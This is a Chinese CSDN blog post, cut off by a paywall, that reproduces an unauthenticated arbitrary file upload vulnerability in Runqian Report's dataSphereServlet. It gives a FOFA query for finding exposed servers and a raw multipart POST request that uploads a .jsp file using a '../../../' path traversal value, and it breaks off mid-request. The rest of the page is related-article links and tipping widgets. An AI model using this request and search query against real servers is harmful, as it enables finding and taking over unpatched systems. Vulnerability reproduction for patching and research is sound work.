【漏洞复现】润乾报表 servlet/dataSphereServlet 任意文件上传漏洞

于 2024-04-23 16:49:33 发布
阅读量463 收藏
点赞数 13
分类专栏: 漏洞复现 文章标签: servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138132320
版权

0x01 产品简介

润乾报表是一个纯JAVA的企业级报表工具,润乾报表作为领先的企业级报表分析软件,提供了高效的报表设计方案、强大的报表展现能力、灵活的部署机制,以及支持强关联语义模型。这些功能使得润乾报表能够为企业级数据分析与商业智能提供高性能、高效率的报表系统解决方案。

0x02 漏洞概述

润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。

0x03 测绘语句

fofa: body="润乾报表"

0x04 漏洞复现

POST /servlet/dataSphereServlet?action=38 HTTP/1.1

Host:

Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9



--eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form-data; name="openGrpxFile"; filename="456.jsp"

Content-Type: text/plain



321

--eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form-data; name="path"



../../../

--eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 13
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
润乾报表平台 InputServlet 任意文件读取漏洞复现
0xSec
04-15 428
润乾报表平台 InputServlet 接口存在任意文件未经漏洞,未经身份攻击者可通过该漏洞读取系统内部配置文件及敏感数据凭证,使系统处于极不安全状态
ReportServlet.rar
04-20
web应用引入润乾报表 java工具类 report4-1.4.jar,web.xml 中配置reportServlet (com.runqian.report4.view.ReportServlet.class) 通过weblgic标准项目部署(war包)启动,reportServlet 加载抛错 :Report licenses is not the server version, replace the correct version; 其实是ReportServlet.class 中获取授权文件时用到getrealpath未正确获取路径。
润乾集成到struts2框架下的导出与打印问题
kongdeqiang_002的专栏
10-19 951
润乾报表服务器部和客户应用做集成时,客户的应用中通常会用到struts2,并且由于安全上的考虑会加上自带的过滤器,拦截执行的servlet,如下: struts2 org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter struts2 /* 这样对导致润乾的reportServlet在访问
润乾V4集成后报错no report config
Alice_656的博客
11-22 1160
环境:tomcat6+V4  报错是:no report config file  先检查数据源,reportconfig和web.xml里面的配置。见RBP-11175文章步骤 检查客户后发现没有问题。让客户进行如下步骤:删除数据源配置信息的xml和reportconfig里面的datasource节点内容。发现问题依旧存在。确定是web.xml合并出了问题。用润乾的web.xml展现正常
润乾报表在Tomcat6.0中的配置
zhidanfeng的专栏
07-10 3172
说明:我使用的是Tomcat6.0,润乾报表的版本是3.5,有4.5的,下载地址在最下面。 经过一天的蛋疼配置之后,总结如下: 1. 需要配置的地方好像只有两处:①Tomcat 6.0目录下面的conf文件夹下面的server.xml,在之间加入如下配置:【网上说Tomcat5.0及其之前的配置不是这样,自己搜一下应该就知道了,相关关键值不变就是方法变了-->......这种的】
Servlet实现多文件上传功能
08-31
本篇文章将详细讲解如何使用Servlet实现文件上传功能,特别是多文件上传。 首先,要实现文件上传,我们需要依赖Apache Commons FileUpload和Commons IO库。这两个库提供了处理文件上传的API,使得我们能够方便地...
Servlet实现文件上传,可多文件上传示例
11-26
一、Servlet实现文件上传,需要添加第三方提供的jar包 下载地址: 1) commons-fileupload-1.2.2-bin.zip: 点击打开链接 2) commons-io-2.3-bin.zip: 点击打开链接  接着把这两个jar包放到 lib文件夹下: 二:...
servlet+JSP+mysql实现文件上传的方法
01-08
本文实例讲述了servlet+JSP+mysql实现文件上传的方法。分享给大家供大家参考,具体如下: 一、文件上传的基本操作: 1、 表单属性enctype的设置 multipart/form-data和application/x-www-form-urlencoded的区别 FORM...
Jsp+Servlet实现文件上传下载 文件上传(一)
10-18
主要为大家详细介绍了Jsp+Servlet实现文件上传下载中的第一部分文件上传,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
servlet+jquery实现文件上传进度条示例代码
11-27
现在文件的上传,特别是大文件上传,都需要进度条,让客户知道上传进度。 本文简单记录下如何弄进度条,以及一些上传信息,比如文件的大小,上传速度,预计剩余时间等一些相关信息。代码是匆忙下简单写的,一些验证...
润乾报表web相关配置
xinking520的专栏
08-09 478
1、<!-- 润乾报表 satrt --> <servlet>  <servlet-name>com.runqian.report.view.DataServlet</servlet-name>  <servlet-class>com.runqian.report.view.DataServletExt</servlet-class...
润乾V5与springBoot集成
rqgxy的博客
02-28 4639
  Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。下面介绍下一个简单的springBoot项目的搭建以及与润乾V5集成的过程。 PS:如已掌握springBoot工程搭建,第一部分可忽略 开发工具:myeclipse 2017 一:maven...
jiaoyanguizeduibi
07-10
jiaoyanguizeduibi
戴师兄数据分析启蒙课_Tableau练习.twbx
07-10
戴师兄数据分析启蒙课_Tableau练习.twbx
2024年欧洲酒精测试仪和药物测试设备市场主要企业市场占有率及排名.docx
07-09
2024年欧洲酒精测试仪和药物测试设备市场主要企业市场占有率及排名.docx
理工科考研自动控制知识点大全
最新发布
07-10
理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全
福州市建筑物矢量数据(Shp格式+带高度).txt
07-09
因文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第一时间进行补充。
NoClassDefFoundError: javax/servlet/annotation/WebServlet
09-29
NoClassDefFoundError: javax/servlet/annotation/WebServlet是一个异常错误,它表示在运行时无法找到javax.servlet.annotation.WebServlet类。这通常是由于缺少相关的依赖库或版本不兼容引起的。 要解决这个问题,您可以尝试以下几个步骤: 1. 确保您的项目中包含了servlet-api.jar这个依赖库。您可以在pom.xml文件中添加以下依赖项来引入该库: ```xml <dependency> <groupId>javax.servlet</groupId> <artifactId>servlet-api</artifactId> <version>3.1.0</version> </dependency> ``` 2. 如果您使用的是Tomcat容器,请确保您的Tomcat版本与servlet-api库的版本兼容。可以尝试使用与您Tomcat版本兼容的servlet-api库版本。 3. 检查您的代码中是否正确导入了javax.servlet.annotation.WebServlet类。确保您的import语句正确,并且没有拼写错误。 如果上述步骤都没有解决问题,您还可以尝试以下措施: 1. 清理和重新构建您的项目。有时编译错误可能会导致类文件无法正确生成。 2. 检查您的IDE设置,确保它正确配置了项目的类路径。 3. 如果您使用的是Maven或Gradle等构建工具,请尝试更新您的构建配置文件,并重新构建项目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值